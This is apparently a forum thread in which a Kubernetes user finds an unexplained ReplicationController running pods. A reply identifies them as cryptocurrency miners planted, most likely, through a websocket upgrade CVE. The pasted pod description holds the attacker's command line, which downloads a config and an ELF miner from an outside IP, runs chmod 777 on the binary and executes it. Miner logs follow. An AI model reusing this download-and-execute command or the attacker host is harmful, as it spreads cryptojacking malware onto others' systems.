My k8s's default namespace add an rc i din't know, it starts 10 pods automatically. and i don't know why.
My k8s version is:
kubectl version
Client Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:34:11Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:23:29Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
And, the pods looks like this: kubectl get po --namespace=default
NAME READY STATUS RESTARTS AGE
mi125yap1 0/1 ImagePullBackOff 0 1d
y1ee114-2hmp4 0/1 ContainerCreating 0 5h
y1ee114-4hqg4 0/1 ImagePullBackOff 0 5h
y1ee114-5tcb5 0/1 ContainerCreating 0 5h
y1ee114-8ft9x 1/1 Running 0 5h
y1ee114-b9bjn 0/1 ImagePullBackOff 0 5h
y1ee114-ptw9g 0/1 ImagePullBackOff 0 5h
y1ee114-rxl4m 0/1 ImagePullBackOff 0 5h
y1ee114-tn9zw 0/1 ImagePullBackOff 0 5h
y1ee114-tx99w 1/1 Running 0 5h
y1ee114-z9b4m 0/1 ImagePullBackOff 0 5h
The two master node with public net it start succesfully, but the node with out access to public net fiald:ImagePullBackOff.
One detail of the pod is:
kubectl describe po y1ee114-8ft9x --namespace=default
Name: y1ee114-8ft9x
Namespace: default
Node: server2/172.17.0.102
Start Time: Wed, 26 Dec 2018 05:35:15 +0800
Labels: app=myresd01
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicationController","namespace":"default","name":"y1ee114","uid":"f7ec0108-088c-11e9-856f-00163e160da9"...
Status: Running
IP: 10.1.42.2
Created By: ReplicationController/y1ee114
Controlled By: ReplicationController/y1ee114
Containers:
myresd01:
Container ID: docker://0b237f7e6c2b359dc1227cfdd1b726e6f6bb5346bcca129ec6a5b15336e13b25
Image: centos
Image ID: docker-pullable://centos@sha256:184e5f35598e333bfa7de10d8fb1cebb5ee4df5bc0f970bf2b1e7c7345136426
Port: <none>
Command:
sh
-c
curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json
State: Running
Started: Wed, 26 Dec 2018 05:35:20 +0800
Ready: True
Restart Count: 0
Environment: <none>
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-5xcgh (ro)
Conditions:
Type Status
Initialized True
Ready True
PodScheduled True
Volumes:
shared-data:
Type: EmptyDir (a temporary directory that shares a pod's lifetime)
Medium:
default-token-5xcgh:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-5xcgh
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: <none>
Events: <none>
And some of logs is:
[2018-12-26 02:46:18] accepted (870/0) diff 2000 (245 ms)
[2018-12-26 02:46:23] accepted (871/0) diff 2000 (246 ms)
[2018-12-26 02:46:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:46:51] accepted (872/0) diff 2000 (248 ms)
[2018-12-26 02:47:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:47:46] accepted (873/0) diff 2000 (245 ms)
[2018-12-26 02:47:49] accepted (874/0) diff 2000 (245 ms)
[2018-12-26 02:47:56] accepted (875/0) diff 2000 (247 ms)
[2018-12-26 02:48:10] accepted (876/0) diff 2000 (391 ms)
[2018-12-26 02:48:18] accepted (877/0) diff 2000 (245 ms)
[2018-12-26 02:48:20] accepted (878/0) diff 2000 (245 ms)
[2018-12-26 02:48:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:48:37] accepted (879/0) diff 2000 (246 ms)
[2018-12-26 02:48:39] accepted (880/0) diff 2000 (245 ms)
[2018-12-26 02:49:00] accepted (881/0) diff 2000 (245 ms)
[2018-12-26 02:49:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:49:39] accepted (882/0) diff 2000 (245 ms)
[2018-12-26 02:50:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:01] accepted (883/0) diff 2000 (245 ms)
[2018-12-26 02:51:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:27] accepted (884/0) diff 2000 (248 ms)
Who know who create this rc and what this for?
Those are cryptocurrency miners. My guess is your cluster was hacked via the Kubernetes websocket upgrade CVE (https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/). I would probably destroy and recreate your cluster.
I figured this out by downloading http://192.99.142.232:8220/tte2 which was mentioned in the config of your describe output and discovered it was an ELF binary. I ran strings
on the binary and after some scrolling found a bunch of strings referring to "cryptonight" which is cryptocurrency mining software.